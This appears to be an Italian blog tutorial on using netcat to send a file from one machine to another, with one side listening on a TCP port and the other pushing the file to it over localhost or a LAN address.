Netcat può agire come server. Questo significa che può mettersi “in ascolto” su di una porta Tcp e attendere una connessione. Per attivare questa funzione bisogna specificare sulla riga di comando il parametro -l (listen) e specificare la porta (-p):

nc -l -p 9999 -vv > miofile

Questo comando mette netcat in ascolto sulla porta 9999; l’output viene reindirizzato al file miofile tramite il simbolo >.

Questo significa che tutto quello che netcat riceverà sulla rete attraverso la porta 9999 verra memorizzato in un file di nome miofile. Sia il valore della porta (in questo caso  9999), sia il nome del file (miofile), sono arbitrari, possono essere qualsiasi cosa.

Mentre sul server netcat “ascolta”, sulla macchina sorgente, ovvero sulla macchina sulla quale è memorizzato il file da trasmettere al server, dovremo usare unnetcat in modalità client per inviare i dati del file da trasferire:

nc 127.0.0.1 9999 -vv < miofile

Con questo comando invio il file “miofile” tramite la redirezione dell’input ottenuta con il simbolo < all’host 127.0.0.1, ovvero il computer sul quale netcat è in “ascolto”, sulla porta 9999. In questo esempio ho utilizzato l’indirizzo del computer locale (127.0.0.1), ma nella realtà naturalmente l’indirizzo dovrà coincidere con l’Ip reale del computer server. Ovvero se il computer sul quale netcat è in ascolto in modalità server è 192.168.0.1, nel netcat in modalità client dovrò indicare proprio questo indirizzo.

Un’ultima considerazione: netcat non fornisce un indicatore di progresso del trasferimento in corso; per sapere quando il trasferimento stesso è terminato occorre controllare con il comando dir ols le dimensioni crescenti del file.

Iscriviti

Ricevi al tuo indirizzo email tutti i nuovi post del sito.

Segui assieme ad altri 53 follower